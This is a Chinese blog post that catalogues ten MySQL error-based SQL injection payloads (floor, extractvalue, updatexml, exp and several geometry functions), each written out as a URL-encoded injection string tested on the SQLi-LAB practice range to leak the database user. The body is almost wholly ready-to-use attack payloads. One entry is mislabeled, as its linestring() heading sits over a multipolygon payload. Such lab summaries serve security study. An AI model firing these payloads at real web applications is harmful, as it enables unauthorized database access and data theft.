SQL注入-报错函数总结

靶场使用SQLi-LAB Lesson1:


image.png

网上看了一些文章,大多数报错函数都是floor() extractvalue() updatexml() exp(),但是在mysql中还有很多其他的报错函数

1、floor()

payload:id=-1'+and+(select 1 from (select count(),concat(user(),floor(rand()2))x from information_schema.tables group by x limit 0,1)a)%23

image.png

2、extractvalue()

使用sqli-lab第二关
payload:id=1+and+(extractvalue(1,concat(0x5c,(select user()))))%23


image.png
3、updatexml

payload:id=1+and+(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))%23


image.png
4、GeometryCollection()

payload:id=1+and+GeometryCollection((select * from(select *from(select user())a)b))%23


image.png
5、polygon()

payload:id=1+and+polygon((select * from(select * from(select user())a)b))%23


image.png
6、multipoint()

payload:id=1+and+multipoint((select * from(select * from (select user())a)b))%23


image.png
7、multilinestring()

payload:id=1+and+multilinestring((select * from(select * from (select user())a)b))%23


image.png
8、linestring()

payload:id=1+and+multipolygon((select * from (select * from (select user())a)b))%23


image.png
9、linestring()

payload:id=1+and+linestring((select * from (select * from (select user())a)b))%23


image.png
10、exp()

payload:id=1+and+exp(~(select * from (select user())a))%23


image.png
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • MSSQL 跨库查询(臭要饭的!黑夜) 榨干MS SQL最后一滴血 SQL语句参考及记录集对象详解 关于SQL S...
    碧海生曲阅读 5,966评论 0 1
  • 1、通过floor报错,注入语句如下:and select 1 from (select count(),conc...
    lokisteven阅读 33,161评论 1 8
  • 最近两周刷了一下sqli-labs,对sql注入有了一个基本的认识。这里写个总结。 1.sql注入原理简单介绍在一...
    jun123123阅读 1,449评论 1 3
  • 常用语句: sql/plus sqlplus 'amdocs/Amdocs.Jx.China.110#@ysdb1...
    好好学习的蜗牛阅读 3,469评论 0 0
  • 出售本人,自己不想要了。天太冷,穿得起貂、开得起车、也可住得了毛草房………[流泪] 手续齐全,8成新,外表有福气,...
    明心老师阅读 1,821评论 0 51

友情链接更多精彩内容